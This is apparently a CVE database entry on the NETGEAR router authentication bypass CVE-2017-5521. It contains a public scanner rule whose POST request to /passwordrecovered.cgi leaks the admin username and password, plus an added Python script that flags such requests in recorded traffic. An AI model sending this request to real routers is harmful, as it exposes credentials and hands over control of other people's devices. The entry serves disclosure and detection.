CVE-2017-5521: Bypassing Authentication on NETGEAR Routers

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

NETGEAR routers before 6.0.10 allow remote attackers to bypass authentication and gain access to the router's administrative interface by using the get_rekt ID (the id parameter of /passwordrecovered.cgi in the rule below).

PoC code [public]

id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: betta
  severity: high
  description: |-
    NETGEAR routers before 6.0.10 allow remote attackers to bypass authentication and gain access to the router's administrative interface by using the get_rekt ID.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
  tags: cve,cve2017,netgear,rce
  created: 2023/07/13

rules:
  r0:
    request:
      method: POST
      path: /passwordrecovered.cgi?id=get_rekt
    expression: response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left")
expression: r0()
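
For defenders, the rule's request path and response markers can be turned into a triage check over recorded HTTP exchanges. The following is an added example, not part of the original entry or the rule author's code. It assumes exchanges were captured by a proxy or packet capture in front of the management interface; the dict fields (client, target, status, body) and all sample data are constructed.

```python
import re
from urllib.parse import urlsplit

# Response markers copied from the rule's expression, applied as unanchored searches.
USER_RE = re.compile(rb'right">Router\s*Admin\s*Username<')
PASS_RE = re.compile(rb'right">Router\s*Admin\s*Password<')
SEVERITY = {"unrelated": 0, "probe": 1, "disclosure": 2}

def classify(target, status, body):
    """Label one recorded exchange: 'unrelated', 'probe' or 'disclosure'."""
    # Match on the path only, so any id value (not just the rule's) is flagged.
    if urlsplit(target).path.lower() != "/passwordrecovered.cgi":
        return "unrelated"
    disclosed = bool(
        status == 200
        and USER_RE.search(body)
        and PASS_RE.search(body)
        and b"left" in body
    )
    return "disclosure" if disclosed else "probe"

def triage(exchanges):
    """Return {client: worst label seen} for clients that touched the endpoint."""
    worst = {}
    for ex in exchanges:
        label = classify(ex["target"], ex["status"], ex["body"])
        current = worst.get(ex["client"], "unrelated")
        if SEVERITY[label] > SEVERITY[current]:
            worst[ex["client"]] = label
    return worst

# Constructed sample data (hypothetical field names, documentation IP addresses).
LEAK_BODY = (
    b'<tr><td align="right">Router Admin Username</td><td align="left">admin</td></tr>'
    b'<tr><td align="right">Router Admin Password</td><td align="left">EXAMPLE-PASSWORD</td></tr>'
)
SAMPLE = [
    {"client": "192.0.2.10", "target": "/passwordrecovered.cgi?id=get_rekt",
     "status": 200, "body": LEAK_BODY},
    {"client": "192.0.2.11", "target": "/passwordrecovered.cgi?id=0",
     "status": 401, "body": b"401 Unauthorized"},
    {"client": "192.0.2.11", "target": "/index.htm", "status": 200, "body": b"<html>left</html>"},
    {"client": "192.0.2.12", "target": "/start.htm", "status": 200, "body": b"<html></html>"},
]

if __name__ == "__main__":
    for client, label in triage(SAMPLE).items():
        print(client, label)
```

A "disclosure" result means the recorded response matched all of the rule's markers, so the admin password on that device should be treated as exposed and rotated after the firmware is updated.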